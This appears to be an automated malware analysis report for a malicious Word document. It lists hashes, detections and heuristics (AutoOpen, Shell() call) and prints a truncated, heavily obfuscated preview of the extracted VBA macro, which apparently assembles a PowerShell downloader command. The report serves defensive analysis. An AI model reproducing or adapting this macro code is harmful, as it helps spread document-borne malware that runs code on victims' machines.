Office (OLE) malware analysis — malicious · bc03c23a46a545ad

MALICIOUS

Office (OLE)

163.0 KB Created: 2018-05-22 15:55:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 358108ec75d54a40b1ad595b47126505 SHA-1: 9f94efabe2e49835eba886d86cf1d952dcf409ed SHA-256: bc03c23a46a545addd1831e133b74bd2e62eb920041f18a23ec9719ea052e642

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is highly indicative of malicious intent. The script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The ClamAV detection name further supports its malicious nature.

Heuristics 6

ClamAV: Doc.Malware.Valyria-7164735-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-7164735-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://me6EQddu2Ko In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 157524 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	157524 bytes
SHA-256: `a8534d081144379ad553bc36a4bb7ddefcd8fbe28ce68cd05f675ffbdeb5c70c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mfbzzHzQn" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ZoJGuSDXL() On Error Resume Next wOiTwkh = (jnNziCG - CDbl(661607) + BcDbMXnOVRn + Fix(KVSOitCW / CLng(26661 * Sqr(vjRiR))) - 220471 / Sin(jsNdwbBXX - SFYbTwjwF - 660043 + CLng(NUwSk)) * 353135 * Fix(661607)) lmlVqfNYrG = "Sp8Yebhx4iFdR( xb4ll ((' . 41nXowershei7XbBGRAsxCU6LbuZlT" dqMiO = Left(Right(lmlVqfNYrG, 26), 7) + CStr(Left(Right(lmlVqfNYrG, 39), 9)) + CStr(Left(Right(lmlVqfNYrG, 44), 3)) fkzDlNhWt = "W6gUJlzJqBHvErbosePTPFf2rPjfUpgIiNMgZx6vT4aEO7HmKcQo5U0GreFeReNce.tosTRt9r0KfQdk7" VPYjkVcDlQJ = CStr(Left(Right(fkzDlNhWt, 72), 10)) + Left(Right(fkzDlNhWt, 25), 15) + CStr(Left(Right(fkzDlNhWt, 49), 2)) fDLjjk = "4sg()[1,3]zJqAyUcaqEqFnT" fsCFiU = Left(Right(fDLjjk, 22), 3) + Left(Right(fDLjjk, 19), 5) wErsM = Chr(43) kuMDApbiLP = "xPW6ELXlzJqAyUcaqEqFn6EL-J'Pjf" sZPwaRVOF = Left(Right(kuMDApbiLP, 27), 4) + CStr(Left(Right(kuMDApbiLP, 9), 6)) HnTREWIUo = Chr(43) zjlGcf = "W6gUJl'Oin6ELaqEqFnT'Ff2rPjfUpgIAFMg6EL) (((67HmKcQ" NRzBXH = CStr(Left(Right(zjlGcf, 45), 7)) + Left(Right(zjlGcf, 15), 9) + Left(Right(zjlGcf, 31), 1) cStiXLwrwM = Chr(43) XJtwKZ = "W6gU'ELLJAyUcaqLqFnTPFf2rPjSnsad6EMgZx6" KznwZ = CStr(Left(Right(XJtwKZ, 35), 5)) + Left(Right(XJtwKZ, 12), 7) + Left(Right(XJtwKZ, 24), 1) LGjbWZIJBJp = (OrqGFrof - CDbl(305804) + zHTKZRWwhr + Fix(uBNCLqtd / CLng(62308 * Sqr(QtMOcHijIT))) - 949809 / Sin(kNENwPRw - mLUSPd - 501235 + CLng(dovOzL)) * 911501 * Fix(305804)) GiaPMAfsNww = Chr(43) fvdoYUs = "xPW6ELalzJqAyUcaqEqsd ='f2r" WXMPinbwQv = Left(Right(fvdoYUs, 24), 4) + CStr(Left(Right(fvdoYUs, 8), 5)) zQSpXPLuZf = Chr(43) jzOJiVH = "xPW' &(lzJqAyUcaqEqFnHZp6ELPjf" LhLjb = Left(Right(jzOJiVH, 27), 4) + CStr(Left(Right(jzOJiVH, 9), 6)) kFUunApoV = Chr(43) iDBMsN = (bvMQdB - CDbl(114388) + zzjTP + Fix(AtlhhXdc / CLng(313900 * Sqr(qQrWcqO))) - 551279 / Sin(BMCRjs - iPJEfC - 211908 + CLng(DtsKkSTf)) * 764557 * Fix(114388)) PvRFHDa = "xP6ELUJlzJqAyUcnHZpFn" mnMSHkiil = Left(Right(PvRFHDa, 19), 3) + Left(Right(PvRFHDa, 6), 4) zdncFOVD = Chr(43) aAOtbjJ = "xH66gUJlELqA" AvnopijkU = CStr(Left(Right(aAOtbjJ, 11), 2)) + Left(Right(aAOtbjJ, 4), 2) JqEJc = Chr(43) lolcrwn = "xPW6ELZlzJqAyUcaqEqFnpeH6ELPjf" woQiuv = Left(Right(lolcrwn, 27), 4) + CStr(Left(Right(lolcrwn, 9), 6)) ankEw = Chr(43) KRJZFZk = (sMBEd - CDbl(400853) + DWwoOijuM + Fix(QfDuiYwCpko / CLng(538850 * Sqr(ofPCpXq))) - 494470 / Sin(zSGtvqjmWQ - QFLJaWpWTO - 541909 + CLng(PtsohTZMpJD)) * 667841 * Fix(400853)) vDsnlhtKK = "46ELZpgUJlzJqAy" zhBHwz = Left(Right(vDsnlhtKK, 14), 2) + CStr(Left(Right(vDsnlhtKK, 12), 3)) LYwRiQp = Chr(43) nZNTFRmE = "xPHZpUJlzJqAyUcw6ELFn" iQfiTHis = Left(Right(nZNTFRmE, 19), 3) + Left(Right(nZNTFRmE, 6), 4) nfzZlTihEli = Chr(43) iAcFWbf = "4s6EL-o6ELzJqAyUcaqEqFnT" zfoAtUPo = Left(Right(iAcFWbf, 22), 3) + Left(Right(iAcFWbf, 19), 5) oUDFiN = Chr(43) TSMVf = "xP6ELUJlzJqAyUcb6ELFn" rYCPoEURz = Left(Right(TSMVf, 19), 3) + Left(Right(TSMVf, 6), 4) ZEQkdiKwhk = Chr(43) LWABuKXiKpt = (BcqNwP - CDbl(750670) + jWUGFYXwQvz + Fix(vJnYVdYsIjE / CLng(371613 * Sqr(VAJAdIbhTT))) - 88993 / Sin(XqPuc - MGiNtzAN - 658990 + CLng(VjZWn)) * 985707 * Fix(750670)) nPjzQZJc = "xP6ELUJlzJqAyUcj6ELFn" uflAo = Left(Right(nPjzQZJc, 19), 3) + Left(Right(nPjzQZJc, 6), 4) wWrtpzkb = Chr(43) bSXZLi = "4s6ELecHZpzJqAyUcaqEqFnT" GhBREHaDH = Left(Right(bSXZLi, 22), 3) + Left(Right(bSXZLi, 19), 5) VlZGYCHjkkP = Chr(43) QDQhPF = "xPHZpUJlzJqAyUct6ELFn" WUdYQ = Left(Right(QDQhPF, 19), 3) + Left(Right(QDQhPF, 6), 4) XHdBPBT = Chr(43) FjHbEiRi = "xP6ELUJlzJqAyUcHZp'Fn" ljlzTc = Left(Right(FjHbEiRi, 19), 3) + Left(Right(FjHbEiRi, 6), 4) BTqZPSqi = Chr(43) XnFFrzdK = "x'66gUJlELqA" AqUCKjn = CStr(Left(Right(XnFFrzdK, 11), 2)) + Left(Right(XnFFrzdK, 4), 2) nzAwh = (KBYhRwFs - CDbl(619018 ... (truncated)

SHA-256: a8534d081144379ad553bc36a4bb7ddefcd8fbe28ce68cd05f675ffbdeb5c70c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mfbzzHzQn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZoJGuSDXL()

On Error Resume Next
wOiTwkh = (jnNziCG - CDbl(661607) + BcDbMXnOVRn + Fix(KVSOitCW / CLng(26661 * Sqr(vjRiR))) - 220471 / Sin(jsNdwbBXX - SFYbTwjwF - 660043 + CLng(NUwSk)) * 353135 * Fix(661607))
lmlVqfNYrG = "Sp8Yebhx4iFdR( xb4ll ((' . 41nXowershei7XbBGRAsxCU6LbuZlT"
dqMiO = Left(Right(lmlVqfNYrG, 26), 7) + CStr(Left(Right(lmlVqfNYrG, 39), 9)) + CStr(Left(Right(lmlVqfNYrG, 44), 3))

fkzDlNhWt = "W6gUJlzJqBHvErbosePTPFf2rPjfUpgIiNMgZx6vT4aEO7HmKcQo5U0GreFeReNce.tosTRt9r0KfQdk7"
VPYjkVcDlQJ = CStr(Left(Right(fkzDlNhWt, 72), 10)) + Left(Right(fkzDlNhWt, 25), 15) + CStr(Left(Right(fkzDlNhWt, 49), 2))

fDLjjk = "4sg()[1,3]zJqAyUcaqEqFnT"
fsCFiU = Left(Right(fDLjjk, 22), 3) + Left(Right(fDLjjk, 19), 5)

wErsM = Chr(43)
kuMDApbiLP = "xPW6ELXlzJqAyUcaqEqFn6EL-J'Pjf"
sZPwaRVOF = Left(Right(kuMDApbiLP, 27), 4) + CStr(Left(Right(kuMDApbiLP, 9), 6))

HnTREWIUo = Chr(43)
zjlGcf = "W6gUJl'Oin6ELaqEqFnT'Ff2rPjfUpgIAFMg6EL) (((67HmKcQ"
NRzBXH = CStr(Left(Right(zjlGcf, 45), 7)) + Left(Right(zjlGcf, 15), 9) + Left(Right(zjlGcf, 31), 1)

cStiXLwrwM = Chr(43)
XJtwKZ = "W6gU'ELLJAyUcaqLqFnTPFf2rPjSnsad6EMgZx6"
KznwZ = CStr(Left(Right(XJtwKZ, 35), 5)) + Left(Right(XJtwKZ, 12), 7) + Left(Right(XJtwKZ, 24), 1)
LGjbWZIJBJp = (OrqGFrof - CDbl(305804) + zHTKZRWwhr + Fix(uBNCLqtd / CLng(62308 * Sqr(QtMOcHijIT))) - 949809 / Sin(kNENwPRw - mLUSPd - 501235 + CLng(dovOzL)) * 911501 * Fix(305804))
GiaPMAfsNww = Chr(43)
fvdoYUs = "xPW6ELalzJqAyUcaqEqsd ='f2r"
WXMPinbwQv = Left(Right(fvdoYUs, 24), 4) + CStr(Left(Right(fvdoYUs, 8), 5))

zQSpXPLuZf = Chr(43)
jzOJiVH = "xPW' &(lzJqAyUcaqEqFnHZp6ELPjf"
LhLjb = Left(Right(jzOJiVH, 27), 4) + CStr(Left(Right(jzOJiVH, 9), 6))

kFUunApoV = Chr(43)
iDBMsN = (bvMQdB - CDbl(114388) + zzjTP + Fix(AtlhhXdc / CLng(313900 * Sqr(qQrWcqO))) - 551279 / Sin(BMCRjs - iPJEfC - 211908 + CLng(DtsKkSTf)) * 764557 * Fix(114388))
PvRFHDa = "xP6ELUJlzJqAyUcnHZpFn"
mnMSHkiil = Left(Right(PvRFHDa, 19), 3) + Left(Right(PvRFHDa, 6), 4)

zdncFOVD = Chr(43)
aAOtbjJ = "xH66gUJlELqA"
AvnopijkU = CStr(Left(Right(aAOtbjJ, 11), 2)) + Left(Right(aAOtbjJ, 4), 2)

JqEJc = Chr(43)
lolcrwn = "xPW6ELZlzJqAyUcaqEqFnpeH6ELPjf"
woQiuv = Left(Right(lolcrwn, 27), 4) + CStr(Left(Right(lolcrwn, 9), 6))

ankEw = Chr(43)
KRJZFZk = (sMBEd - CDbl(400853) + DWwoOijuM + Fix(QfDuiYwCpko / CLng(538850 * Sqr(ofPCpXq))) - 494470 / Sin(zSGtvqjmWQ - QFLJaWpWTO - 541909 + CLng(PtsohTZMpJD)) * 667841 * Fix(400853))
vDsnlhtKK = "46ELZpgUJlzJqAy"
zhBHwz = Left(Right(vDsnlhtKK, 14), 2) + CStr(Left(Right(vDsnlhtKK, 12), 3))

LYwRiQp = Chr(43)
nZNTFRmE = "xPHZpUJlzJqAyUcw6ELFn"
iQfiTHis = Left(Right(nZNTFRmE, 19), 3) + Left(Right(nZNTFRmE, 6), 4)

nfzZlTihEli = Chr(43)
iAcFWbf = "4s6EL-o6ELzJqAyUcaqEqFnT"
zfoAtUPo = Left(Right(iAcFWbf, 22), 3) + Left(Right(iAcFWbf, 19), 5)

oUDFiN = Chr(43)
TSMVf = "xP6ELUJlzJqAyUcb6ELFn"
rYCPoEURz = Left(Right(TSMVf, 19), 3) + Left(Right(TSMVf, 6), 4)

ZEQkdiKwhk = Chr(43)
LWABuKXiKpt = (BcqNwP - CDbl(750670) + jWUGFYXwQvz + Fix(vJnYVdYsIjE / CLng(371613 * Sqr(VAJAdIbhTT))) - 88993 / Sin(XqPuc - MGiNtzAN - 658990 + CLng(VjZWn)) * 985707 * Fix(750670))
nPjzQZJc = "xP6ELUJlzJqAyUcj6ELFn"
uflAo = Left(Right(nPjzQZJc, 19), 3) + Left(Right(nPjzQZJc, 6), 4)

wWrtpzkb = Chr(43)
bSXZLi = "4s6ELecHZpzJqAyUcaqEqFnT"
GhBREHaDH = Left(Right(bSXZLi, 22), 3) + Left(Right(bSXZLi, 19), 5)

VlZGYCHjkkP = Chr(43)
QDQhPF = "xPHZpUJlzJqAyUct6ELFn"
WUdYQ = Left(Right(QDQhPF, 19), 3) + Left(Right(QDQhPF, 6), 4)

XHdBPBT = Chr(43)
FjHbEiRi = "xP6ELUJlzJqAyUcHZp'Fn"
ljlzTc = Left(Right(FjHbEiRi, 19), 3) + Left(Right(FjHbEiRi, 6), 4)

BTqZPSqi = Chr(43)
XnFFrzdK = "x'66gUJlELqA"
AqUCKjn = CStr(Left(Right(XnFFrzdK, 11), 2)) + Left(Right(XnFFrzdK, 4), 2)
nzAwh = (KBYhRwFs - CDbl(619018
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.